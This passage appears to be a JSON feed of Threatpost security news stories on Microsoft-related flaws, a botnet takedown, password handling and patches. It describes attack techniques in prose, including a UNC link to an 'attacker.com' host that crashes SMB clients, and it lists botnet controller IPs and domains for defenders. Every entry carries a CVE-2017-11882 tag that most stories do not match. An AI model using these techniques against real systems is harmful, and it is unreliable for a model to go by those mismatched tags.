exploit mitigations have been so successful in driving up the cost of exploit development for attackers.\n", "cvss3": {}, "published": "2017-05-26T12:00:08", "type": 
"threatpost", "title": "Mark Dowd on Exploit Mitigation Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:20:30", "id": "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "href": "https://threatpost.com/mark-dowd-on-exploit-mitigation-development/125947/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "description": "A severe vulnerability in the way Microsoft Office 365 handles federated identities via SAML put an attacker in position to have access to any account and data, including email messages and files stored in the cloud-based service.\n\nMicrosoft pushed through a mitigation to the service on Jan. 5, seven hours after being notified by researchers Yiannis Kakavas and Klemen Bratec.\n\n\u201cThe attack surface was quite big (Outlook Online, OneDrive, Skype for Business, OneNote \u2013 depending on what the company has paid for in terms of licensing ),\u201d Kakavas and Bratec told Threatpost via email. \u201cAnd a malicious user exploiting this vulnerability could have gained access to very sensitive private and company information. (emails, internal documents etc. ).\u201d\n\nOffice 365 users in the line of fire that had configured domains as federated were extensive, worldwide and high profile, ranging from British Airways, Microsoft, Vodafone, Verizon and many others listed in a [report](<http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass>) [published](<https://bratec.si/security/2016/04/27/road-to-hell-paved-with-saml-assertions.html>) this week.\n\nKakavas, of the Greek Research and Technology Network, and Bratec of the Sola prihodnosti Maribor, identified the vulnerability in the SAML Service Provider implementation in Office 365. The flaw allowed for a \u201ccross-domain authentication bypass affecting all federated domains,\u201d the researchers wrote. 
SAML is the Security Assertion Markup Language, a standard used by organizations to exchange authentication and authorization data. SAML is used primarily as a means of enabling single sign-on between web domains.\n\nThe problem with Microsoft\u2019s implementation of SAML 2.0 in Office 365 is that the service fails to validate the subject of the assertion being passed\u2014specifically the NameID element. Validation of the exchange then rests on other values, such as the IDPEmail attribute.\n\n\u201cAs it turns out, the Service Provider used the Issuer of the Assertion only to find the matching certificate in order to verify the SAML Response/Assertion signature, but didn\u2019t perform any sanity checks on the supplied value of the IDPEmail attribute,\u201d the researchers wrote. \u201cThat basically means that it would happily consume assertions, asserting that Identity Provider X has authenticated users of Identity Provider Y.\u201d\n\nThe researchers describe the technical details in their report. They told Threatpost that the flaw was relatively easy to exploit, but added there is no indication the flaw had ever been publicly exploited, nor how long it was present in Office 365 before it was found.\n\n\u201cAll an attacker needed was a trial subscription to Office 365 and a SAML 2.0 Identity Provider installation. There is some bare minimum of SAML knowledge one must have, but the process of setting up SAML SSO with Office 365 is well documented and easy to follow,\u201d the researchers said. 
\u201cA more advanced attacker with slightly better SAML knowledge would be able to script a tool and perform the attack in an automated manner without the need of a SAML 2.0 Identity Provider.\u201d\n\nThe researchers said the flaw is not limited to SAML-based single sign-on implementations; they were able to carry out the same attack over Active Directory Federation Services.\n\n\u201cThe SAML Service Provider consumed the SAML assertion from the attacker\u2019s org Identity Provider even though the spmb.si domain is configured to be federated with WS-Trust, forwarded it to the token translation service which translated it to a WS-Trust token and \u2026 we were in,\u201d they wrote.\n\nThey told Threatpost: \u201cWe were surprised that the organizations that have their domains federated using WS-Trust and ADFS were also vulnerable to this. We know that pretty much only academic institutions use SAML 2.0 SSO, so in the beginning the number of vulnerable organizations seemed to be relatively small.\u201d\n\nThe two said they were awarded close to the maximum bounty from Microsoft for their research; the bounty pays between $500 and $15,000 USD.\n", "cvss3": {}, "published": "2016-04-28T10:44:58", "type": "threatpost", "title": "Office 365 Vulnerability Exposed Any Federated Account", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-29T16:54:19", "id": "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "href": "https://threatpost.com/office-365-vulnerability-exposed-any-federated-account/117716/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and 
released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in an email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. 
\u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. This means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). 
The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and an SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. 
But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufactures smart meters for installation around the world. 
Those meters are used to regulate and measure power usage in homes and businesses, and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program, based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. Steve Lipner, one of the driving forces behind the Trustworthy Computing initiative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. 
\u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. 
\u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround Microsoft shipped for the vulnerability late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, we believe it is no longer safe to browse to a malicious, untrusted WebDAV server in the Internet Zone and double-click on **_any_** type of files. Attackers are clever, substituting dangerous file icons with safe, trusted file icons. They have even recently begun obfuscating the filename based on character encoding tricks (such as right-to-left character encoding). Their goal is to entice unsuspecting users into double-clicking on a malicious executable. With or without this new remote vector to the DLL Preloading issue, it\u2019s very hard to make a trust decision given the amount of control an attacker has over the malicious WebDAV server browsing experience. 
We recommend users only double-click on file icons from WebDAV shares known to be trusted, safe, and not under the control of a malicious attacker,\u201d Ness said.\n\nThe company has released a workaround for the DLL bug, which involved editing the registry to create a new entry. The solution also includes a downloadable tool. But the tool was turned off by default, so Microsoft has now published a new FixIt tool that will automatically enable it.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\n * Right-click Session Manager, point to New, and then click Dword Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. \n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. 
Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. 
To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computer is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft._\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:21", "description": "The U.S. 
Navy recently hired an outside contractor, Obscure Technologies, to develop computer forensics tools capable of analyzing network traffic and stored data on gaming consoles.\n\nThe contract, valued at $177,237.50, calls on Obscure Technologies to create hardware and software tools that can be used to extract data from video game systems, compile a collection of data (disk images; flash memory dumps; configuration settings) extracted from new and used video game systems, and prepare a 10-20 page report including the following:\n\nDetailed accounts of issues involved in extracting forensic data from a series of game consoles, technical information regarding how information can be extracted from video game systems, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.\n\n\u201cThis project involves furnishing video game systems, both new and used, and creating prototype rigs for capturing data from the video game systems,\u201d reads the Navy\u2019s official listing.\n\nThe project seeks to create these tools for use by the United States Department of Homeland Security Science and Technology.\n\nObscure Technologies was awarded this contract, the Navy claims, because they appear to be the only U.S. company in the business of purchasing used computer equipment for the purpose of accessing the data stored within. 
The Navy\u2019s justification and approval report also notes that Obscure Technologies' lead scientist has experience reverse engineering the Microsoft XBOX.\n\nYou can find the Navy\u2019s justification and approval document [here](<https://www.fbo.gov/index?s=opportunity&mode=form&id=fa7296a2e0980fe24aa72c919a665b44>).\n", "cvss3": {}, "published": "2012-04-09T18:33:01", "type": "threatpost", "title": "Navy Hires Contractor to Data-Mine Gaming Consoles", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:05:32", "id": "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "href": "https://threatpost.com/navy-hires-contractor-data-mine-gaming-consoles-040912/76420/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released an announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. 
This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are, simply put, infected machines that do not run in router mode. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. 
A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form a backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host an nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. The two IP addresses of each pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USER\\Software\\Google together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer sends 250 of its entries back. 
By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. 
If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated, as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for an intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extent how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of their real controllers. 
At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. 
However, this would be illegal in most countries and will thus remain theoretical.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "[](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks and has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. 
An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides a fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after Microsoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. 
\n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHub. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP POST requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. 
